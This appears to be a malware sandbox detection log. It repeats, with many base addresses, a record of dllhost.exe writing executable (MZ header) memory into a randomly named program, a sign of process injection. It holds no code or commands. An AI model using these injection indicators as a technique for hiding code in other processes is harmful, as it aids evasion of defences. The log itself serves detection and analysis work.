Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 11E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 6B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 29D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 29F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 24D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 23D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 23F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: C10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 25A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 25C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 21E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 23E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 25A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 21E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2120000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 21B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2490000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 26B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 22F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 25E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2C10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 24B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 24D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 26F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A20000 value starts with: 4D5A
